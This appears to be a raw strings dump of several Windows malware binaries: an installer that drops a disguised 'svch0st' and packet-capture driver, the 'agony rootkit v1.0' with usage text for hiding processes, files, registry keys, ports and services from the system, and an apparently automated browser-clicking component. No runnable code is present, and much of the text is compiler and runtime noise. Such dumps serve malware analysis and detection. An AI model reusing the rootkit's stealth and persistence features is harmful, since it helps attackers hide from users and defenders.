!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
!9l$Lr
$9l$0r
'9l$Lr
0WWWWW
0WWWWW
QQSVWd
0SSSSS
HHtXHHt
>If90t
uBhOf@
>=Yt1j
j@j ^V
tehVi@
Ht Hu4j
s[S;7|G;w
tR99u2
URPQQh
0A@@Ju
^SSSSS
j"^SSSSS
0SSSSS
0SSSSS
;t$,v-
UQPXY]Y[
uL9= )A
t"SS9]
PPPPPPPP
PPPPPPPP
t+WWVPV
string too long
invalid string position
Unknown exception
(null)
`h````
xpxxxx
CorExitProcess
runtime error
TLOSS error
SING error
DOMAIN error
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
bad exception
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
`h`hhh
xppwpp
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
CONOUT$
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
Windows NT
Windows 2000
Windows XP
Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 32s
Windows Unknown
DbSecuritySpt
C:\Program Files\
npf.sys
Packet.dll
svch0st
SESDKDummy.dll
SESDKDummy64.dll
Windows Media Player
DNSSupport
DNSProtection
bad allocation
Taskkill /F /IM %s.exe
F:\Updates\
\GatesInstall\Release\GatesInstall.pdb
KERNEL32.DLL
ADVAPI32.dll
GetSystemWow64DirectoryA
GetLastError
WinExec
CloseHandle
GetSystemInfo
CreateProcessA
WriteFile
CreateFileA
DeleteFileA
SizeofResource
LoadResource
FindResourceA
CreateDirectoryA
GetVersionExA
GetCommandLineA
RaiseException
RtlUnwind
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
HeapFree
HeapAlloc
GetModuleHandleW
GetProcAddress
ExitProcess
GetStdHandle
GetModuleFileNameA
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
GetFileType
GetStartupInfoA
DeleteCriticalSection
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
InterlockedIncrement
SetLastError
GetCurrentThreadId
InterlockedDecrement
HeapCreate
VirtualFree
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
LeaveCriticalSection
EnterCriticalSection
VirtualAlloc
HeapReAlloc
HeapSize
SetFilePointer
GetConsoleCP
GetConsoleMode
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
LoadLibraryA
InitializeCriticalSectionAndSpinCount
SetStdHandle
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
GetLocaleInfoA
FlushFileBuffers
OpenSCManagerA
StartServiceA
CreateServiceA
DeleteService
CloseServiceHandle
OpenServiceA
ControlService
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVexception@std@@
.?AVbad_alloc@std@@
!This program cannot be run in DOS mode.
h.rdata
H.data
.reloc
sAhDdk Wj
E$HtNHtBHt6
|UhDdk
RSDS&5/{
f:\updates\
\windows
\2003\i386\agony.pdb
MmMapLockedPages
MmBuildMdlForNonPagedPool
MmCreateMdl
KeServiceDescriptorTable
IoFreeMdl
MmUnmapLockedPages
ZwQueryVolumeInformationFile
ZwDeviceIoControlFile
ZwEnumerateValueKey
ZwEnumerateKey
ZwQueryDirectoryFile
ZwQuerySystemInformation
IoDeleteDevice
IoDeleteSymbolicLink
RtlInitUnicodeString
ExFreePoolWithTag
IofCompleteRequest
ExAllocatePoolWithTag
wcslen
IoCreateSymbolicLink
IoCreateDevice
ZwQueryInformationFile
ZwAdjustPrivilegesToken
ZwOpenProcessToken
ZwClose
ZwReadFile
ZwCreateFile
wcscmp
_alldiv
ObReferenceObjectByHandle
ZwOpenProcess
_strnicmp
MmIsAddressValid
KeDetachProcess
MmHighestUserAddress
ZwQueryInformationProcess
KeAttachProcess
KeTickCount
KeBugCheckEx
ntoskrnl.exe
0 0.030?0E0J0P0f0n0w0|0
1!1,171=1C1I1O1
2%2*282V2u2
4-434A4K4P4[4b4{4
575?5S5Y5g5q5v5
6%6+696C6H6S6Z6b6g6o6w6
8%8/858A8V8]8b8h8w8
:2;G;O;o;w;
;5<J<R<r<z<
2'383k3
4 595K5b5t5
5"6(6<6P6
7(717;7Z7d7
0#020;0B0
!This program cannot be run in DOS mode.
`.rdata
@.data
D$(Ph?
HHtXHHt
>If90t
uBhBG@
>=Yt1j
j@j ^V
tehIJ@
0A@@Ju
^SSSSS
j"^SSSSS
URPQQh`k@
0SSSSS
0SSSSS
0SSSSS
t"SS9]
PPPPPPPP
PPPPPPPP
;t$,v-
UQPXY]Y[
t+WWVPV
bad allocation
%s -h : more help
%s -stop : stop and uninstall rootkit
%s -r : survive to reboot (with all option in this cmdline)
%s -space C:X : add X MB to available space on volume C
%s -s service : hide the service
%s -udp port : hide the UDP port
%s -tcp port : hide the TCP port
%s -v valeur : hide the reg value
%s -k cle : hide the reg key
%s -f fichier/dossier : hide the file
%s -p process.exe : hide the process
agony rootkit v1.0
StubPath
{256dc5e0e-7c46-11d3-b5bf-0000f8695621}
Software\Microsoft\Active Setup\Installed Components
{232f4e3f2-bab8-11d0-97b9-00c04f98bcb9}
%c:\%s
VOLUME.INI
cannot communicate with the driver.
volume %c space will not be falsificated
-space
%s -space C:5000 D:1000 F:5500
we can cumulate for option -space, like other options:
%s -space volume_letter:space_to_hide_in_MB
for the -space option, the syntax is:
we can also choose to launch our command one by one
%s -p process.exe process2.exe -s service1 -f process1.exe process2.exe
we can accumulate different options on a same line:
for exemple: agony -p process1.exe process2.exe will hide 2 process
all options "cumulables" in a same command line
\\.\Global\%s
agony.sys
Windows Media Player\
C:\Program Files\
(null)
`h````
xpxxxx
CorExitProcess
runtime error
TLOSS error
SING error
DOMAIN error
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
`h`hhh
xppwpp
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
CONOUT$
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GetFileAttributesA
CloseHandle
WriteFile
GetLastError
CreateFileA
GetModuleFileNameA
SetFilePointer
GetDriveTypeA
DeleteFileA
GetLogicalDriveStringsA
MultiByteToWideChar
DeviceIoControl
KERNEL32.dll
RegSetValueExA
RegCreateKeyExA
RegDeleteKeyA
RegCloseKey
RegOpenKeyExA
DeleteService
ControlService
CloseServiceHandle
StartServiceA
OpenServiceA
CreateServiceA
OpenSCManagerA
ADVAPI32.dll
GetCommandLineA
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
EnterCriticalSection
LeaveCriticalSection
GetModuleHandleW
GetProcAddress
ExitProcess
GetStdHandle
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
GetFileType
GetStartupInfoA
DeleteCriticalSection
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
InterlockedIncrement
SetLastError
GetCurrentThreadId
InterlockedDecrement
HeapCreate
VirtualFree
HeapFree
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
GetSystemTimeAsFileTime
GetConsoleCP
GetConsoleMode
GetCPInfo
GetACP
GetOEMCP
IsValidCodePage
RtlUnwind
LoadLibraryA
InitializeCriticalSectionAndSpinCount
HeapAlloc
VirtualAlloc
HeapReAlloc
SetStdHandle
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
GetLocaleInfoA
FlushFileBuffers
HeapSize
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADMZ
!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
PWWWWWWWWU
L$4QRP
D$8SVW
N<9N<u3
L$D_^[3
C 9s u
L$$+L$
l$$9l$ v
L$$+L$
^(;^,v
D$$QRP
L$$RPQ
tgSUVW
_(9w r
<A|B<Z
\$ 9|$lr
\$X9|$Pr
L$4QRf
d$$hd?C
D$@SUVW
\$`9|$Pr
D$ 9|$4s
9D$0v1
Q9^hUW}=
Fp9|$<r
\$(9|$|r
\$h9|$`r
w`;wdv
D$LtAC
G,Phl@C
}`;}dv
u`;udv
u`;udv
u`;udv
u`;udv
D$ tAC
D$$QRP
8^EuaU
L$$RPQ
\$ 9t$$ue
\$ 9t$,uE
l$$;l$,t
!8\$pt
\$<8\$
L$hIQ3
^\9~Tr
D$8@;D$4
~4h$BC
f9PPu~
u 9A(t
D$$UPW
Q,SSSSUP
u 9A(t"
\$H9|$@r
^t9nlr
^X9nPr
^<9n4r
L$<</t&
</t!<?t
t$L;t$Pv
t$P9t$Lv
D$<9t$Ps
D$<9t$Ps
D$<9t$Ps
D$<9t$Ps
D$<9t$Ps
D$<9t$Ps
D$<9t$Ps
\$x9t$pr
\$\9t$Pr
\$x9t$pr
\$\9t$Pr
D$pSUVW
\$ 9t$$ue
\$ 9t$,uE
l$$;l$,t
!8\$pt
WWSSSh
D$$9t$Xrk
L$ RPQ
\$ 9t$$ue
\$ 9t$,uE
l$$;l$,t
D$$SUVW
L$(_^[3
UPhXEC
NUQhXEC
D$$SUW
0WWWWW
0WWWWW
^SSSSS
j"^SSSSS
.;1s(N
HHt4HHt
Ht\Ht,
teHtFHt&Hu
ty<%tA
^SSSSS
^SSSSS
jXhxYC
QQSVWd
PPPPPPPP
j,h@ZC
Ht Hu4j
s[S;7|G;w
tR99u2
t"SS9]
^SSSSS
^SSSSS
0SSSSS
HHtXHHt
>If90t
F\=`3C
HHtYHHt
0A@@Ju
C PjPV
C$PjQV
C*PjTV
C+PjUV
C,PjVV
C-PjWV
C.PjRV
C/PjSV
0SSSSS
0SSSSS
PPPPPPPP
jF<-uH
<xtV<XtR
<at9<rt,<wt
URPQQh
j@j ^V
<+t(<-t$:
+t HHt
>:u8FV
VVVVVQRSSj
^WWWWW
>=Yt1j
_VVVVV
^WWWWW
t+WWVPV
u,VVWV
t VV9u
tGHt.Ht&
^SSSSS
8VVVVV
;t$,v-
UQPXY]Y[
0SSSSS
_VVVVV
string too long
invalid string position
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
Unknown exception
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
bad exception
!"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
(null)
`h````
xpxxxx
EncodePointer
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
CorExitProcess
`h`hhh
xppwpp
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
britain
america
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
Norwegian-Nynorsk
runtime error
TLOSS error
SING error
DOMAIN error
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
- not enough space for environment
- not enough space for arguments
- floating point support not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
Illegal byte sequence
Directory not empty
Function not implemented
No locks available
Filename too long
Resource deadlock avoided
Result too large
Domain error
Broken pipe
Too many links
Read-only file system
Invalid seek
No space left on device
File too large
Inappropriate I/O control operation
Too many open files
Too many open files in system
Invalid argument
Is a directory
Not a directory
No such device
Improper link
File exists
Resource device
Unknown error
Bad address
Permission denied
Not enough space
Resource temporarily unavailable
No child processes
Bad file descriptor
Exec format error
Arg list too long
No such device or address
Input/output error
Interrupted function call
No such process
No such file or directory
Operation not permitted
No error
UTF-16LE
UNICODE
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
GAIsProcessorFeaturePresent
KERNEL32
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
CONOUT$
1#QNAN
1#SNAN
bad allocation
WebToos
WS2_32.dll
getaddrinfo
freeaddrinfo
list<T> too long
sockt create error
connect error, Host:%s, Port: %d
, nErrorCode: %d
Send len: %d
vector<T> too long
javascript
HTTP/1.1
Referer
image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept
Accept-Language
gzip, deflate
Accept-Encoding
connect error
send error
parse header error, code: %d
CONTENT-LENGTH
CONTENT-LENGTH
, Len: %d [%s]
rcv data error
TRANSFER-ENCODING
, len: %d [%s]
............................
RcvStream: rcv error, code: %d
error 3
error 4
RcvBlock: rcv error, code: %d
ParseHeader: rcv error, code: %d
ParseHeader error, nRcvLen: %d
ParseHeader error-1
CONTENT-LOCATION
-----------------------Localtion: %s
path: %s
code: %d
RcvData rcv error, code: %d
time out: %d
map/set<T> too long
invalid map/set<T> iterator
IEctrl.log
start...
strCmd: %d
ParseTask error
Cmd count: %d
New CIEThreadEx...
OnClick: %s
OnClick: %s-->%s
: %d,
%d, Url: %s
mailto
gopher
Keep-Alive
Connection
User-Agent
Mozilla/4.0
(compatible;
SOFTWARE\Microsoft\Internet Explorer\Version Vector
MSIE 6.0
Windows NT %d.%d; Trident/4.0;
Windows NT %d.%d;
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
task_list
------------------
not exits task_list
link_list
link_list: %s
XWebBrowser
1234567890
%Y-%m-%d %H:%M:%S
Access violation - no RTTI data!
Bad dynamic_cast!
E:\SVN\trunk\2014\
\IECtrl\Release\IECtrl.pdb
FindResourceA
FreeLibrary
LoadResource
InitializeCriticalSection
FindResourceExA
WideCharToMultiByte
SizeofResource
LeaveCriticalSection
GetLastError
GetProcAddress
EnterCriticalSection
LoadLibraryA
LockResource
GetModuleHandleA
DeleteCriticalSection
GetCurrentThreadId
CreateFileA
GetFileSize
SetFilePointer
WaitForSingleObject
SetEvent
TerminateThread
CreateEventA
ReadFile
GetSystemDirectoryA
FindFirstFileA
FindClose
FindNextFileA
CloseHandle
InterlockedDecrement
MultiByteToWideChar
CreateThread
InterlockedIncrement
lstrlenW
GetSystemInfo
GetVersionExA
SetThreadPriority
GetModuleFileNameA
WriteFile
GetCurrentProcess
KERNEL32.dll
PostMessageA
DefWindowProcA
PeekMessageA
CreateWindowExA
GetWindowLongA
SetWindowLongA
KillTimer
RegisterClassExA
SetTimer
DestroyWindow
SetWindowTextA
GetWindowTextA
EnumWindows
GetClientRect
GetParent
DispatchMessageA
TranslateMessage
PostThreadMessageA
GetMessageA
UpdateWindow
IsWindow
ShowWindow
TranslateAcceleratorA
USER32.dll
RegQueryValueExA
RegCreateKeyExA
RegOpenKeyExA
RegQueryInfoKeyA
RegEnumValueA
RegCloseKey
ADVAPI32.dll
OleInitialize
StgCreateDocfile
CoInitialize
OleCreate
ole32.dll
OLEAUT32.dll
WS2_32.dll
RaiseException
HeapDestroy
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
GetProcessHeap
InterlockedExchange
GetLocaleInfoA
TerminateProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
GetSystemTimeAsFileTime
GetTimeFormatA
GetDateFormatA
GetCommandLineA
GetStartupInfoA
RtlUnwind
LCMapStringA
LCMapStringW
GetCPInfo
CompareStringA
CompareStringW
GetStringTypeW
GetModuleHandleW
TlsGetValue
TlsAlloc
TlsSetValue
TlsFree
SetLastError
ExitProcess
HeapCreate
VirtualFree
VirtualAlloc
GetACP
GetOEMCP
IsValidCodePage
GetUserDefaultLCID
EnumSystemLocalesA
IsValidLocale
GetStringTypeA
GetStdHandle
GetConsoleCP
GetConsoleMode
SetHandleCount
GetFileType
FlushFileBuffers
GetTimeZoneInformation
FreeEnvironmentStringsA
GetEnvironmentStrings
FreeEnvironmentStringsW
GetEnvironmentStringsW
QueryPerformanceCounter
GetTickCount
GetCurrentProcessId
InitializeCriticalSectionAndSpinCount
GetLocaleInfoW
SetStdHandle
WriteConsoleA
GetConsoleOutputCP
WriteConsoleW
SetEndOfFile
SetEnvironmentVariableA
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
.?AVbad_typeid@std@@
.?AV__non_rtti_object@std@@
.?AVtype_info@@
.?AVbad_exception@std@@
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AV_com_error@@
.?AVCAsyncSocketEx@@
.?AVCAsyncSocketExHelperWindow@@
.?AVCAtlException@ATL@@
.?AVexception@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVbad_alloc@std@@
.?AVCTCPConnect@@
.?AVCThread@@
.?AVCAsynThread@@
.?AVXWebBrowser@@
.?AVHttpGet_Task@@
.?AVmini_lock@@
.?AVmini_mutex@@
.?AVout_of_range@std@@
.?AVCIECtrlThreadEx@@
.?AVCIEThreadEx@@
.?AUIOleInPlaceUIWindow@@
.?AUIOleInPlaceFrame@@
.?AUIOleWindow@@
.?AUIOleInPlaceSite@@
.?AUIOleClientSite@@
.?AUIUnknown@@
.?AUIDispatch@@
.?AVCIEWebBrowser@@
.?AVmini_httpres@@
.?AVmini_httpreq@@
.?AVCTaskMgr@@
.?AVCAtom@@
.?AVCAtomList@@
.?AVCAtomString@@
.?AVXWeb@@
.?AVCAtomLong@@
.?AVCAtomDicti@@
.?AVbad_cast@std@@
.?AVmini_log@@
.?AVmini_registry@@
.?AVmini_stream@@
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
0,0;0I0
1%1S1a1
3%3L3Q3j3w3
0<0Z0{0
0A1F1g1l1
243J3d3
424V4~4
6!6^6y6
8"8'80858;8D8J8U8\8b8h8n8t8|8
8V9\9j9p9v9
:$:*:0:6:>:D:u:
4 4)4Z4r4
=J>_>s>
6%676x6
=C=S=t=
2:3@3|3
T0F1X162E2"3
:#:0:F:P:
;-<o<L={=
>C>$?\?
2!292@2[2
3/3S3b3q3
3P5X5s5
6S7e7w7
91H1V1Z2U3r3
3#464d4
:#:6:\:j:
?S?e?w?
2*2?2g2
3c5p5#909C=Q=
9C9V9v9
6I7[7|7
8'8I8[8l8
?,?3?:?A?
030E0]0r0
:l;`<m<3=A=X=
3!4:4_4n4z4
6S6x6|6
7t7C9S9j9p9v9
5%575r5H7
9!:5:d:i:
;";U;Z;A<e<
?3?@?[?a?
#101H2z2C7U7v7
:&:F:w:
0D0J0f0m0
0C1R1^1
3*4E4i4s4
6W6^6e6l6
;><S>`>
>#?4?M?|?
4C:R:f:
30B0Q0
3*4c5u5
9F;N;T;p;
= =:=S=
435_5{5
6%6B6|6
6>7:8D8a8r8|8
9=9Z9k9q9|9
<)<F<S<
>#>L>Q>h>
5I7(8=8
,0E0V0
0w1x2)3
8%9/9;9D9
?0?S?f?
='?J?U?x?
>(>/>7><>@>D>m>
?$?(?,?0?
0M0T0X0\0`0d0h0l0p0
2*3/393
<2<=<`<$=1=F=X=
^3b3f3j3n3r3v3z3~3
4D4M4Y4
4W5\5b5f5l5p5v5z5
9*:2:z:
;3;Q;X;\;`;d;h;l;p;t;
;6<A<\<c<h<l<p<
=Z=`=d=h=l=
2G3M3S3Y3_3e3l3s3z3
545k5|5
7!8?8e8
40474^4d4o4{4
5 5&52585E5O5V5n5}5
5/656_6e6
697\7f7
8 8%8,82898?8G8N8S8[8d8p8u8z8
9=9C9_9{9
9):2:_:z:
;,;7;<;L;V;];h;q;
;%<2<\<a<l<q<
<@=M=U=\=b=|=
>'><>F>l>
= =$=(=,=0=4=O=T=b=o=v=
>$>7>[>
f1t1z1
20262A2F2N2T2^2e2y2
<"=/=9=G=P=Z=
=4>i>|>
Q0]0p0
1%1L1u1
8E9c9u9
L0b0s0
?#?G?P?W?`?
0*0B0T0x0
7A7Q7~7
7)858A9&:<:
7g809a9w9
=->j>t>
0p1@4W4
898r8~8
8V9_9e9j9
:':,:9:A:P:W:d:
=C>K>W>d>k>s>{>
0/0N2U2
7[8h8q8
9U9`9j9{9
99;J;R;X;];c;
<&<-<d<
= =%=F=K=q=
3.474=4
525x5~5
1B1H1Q1X1
6 6/686M6}6
7J7X7^7n7s7
7>8[8x8
9$9.959P9X9e9l9&:E:)<
='=C=U=h=z=
1?1\1g1~1
5!5\5x5
6#6c6u6
7*888@8M8k8u8~8
011U1_;
?"?V?b?q?}?
3"333O3Z3
858R8}8
:#;S;z;
4'5}5,6Z6>7{7
2=2Q2W2\2v2
3!323:3@3F3Q3s3}3
3,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
50686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6`8d8h8l8p8t8x8
7 7(70787@7H7P7X7`7h7p7x7
8 8(80888@8H8P8X8`8h8p8x8
9 9(90989@9H9P9X9`9h9p9x9
: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:
; ;$;(;,;0;4;8;<;@;D;H;L;
;X<\<`<d<h<l<p<t<x<|<
<,=0=4=8=<=@=D=H=L=P=T=X=\=`=d=h=l=p=t=
h1l1p1t1x1|1
1T2X2\2`2d2h2l2p2t2x2|2
3 3$3(3,3034383<3@3D3
3\5`5d5h5l5p5
6 6$6(6,6064686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6|6
7 7$7(7,7074787<7@7D7H7L7P7T7X7\7`7d7h7l7p7t7
9 90949D9H9L9T9l9|9
:(:,:0:8:P:`:d:t:x:
;0;@;D;T;X;\;d;|;
< <$<(<0<H<X<\<l<p<t<|<
=$=(=0=H=X=\=l=p=x=
>(>8><>L>P>X>p>
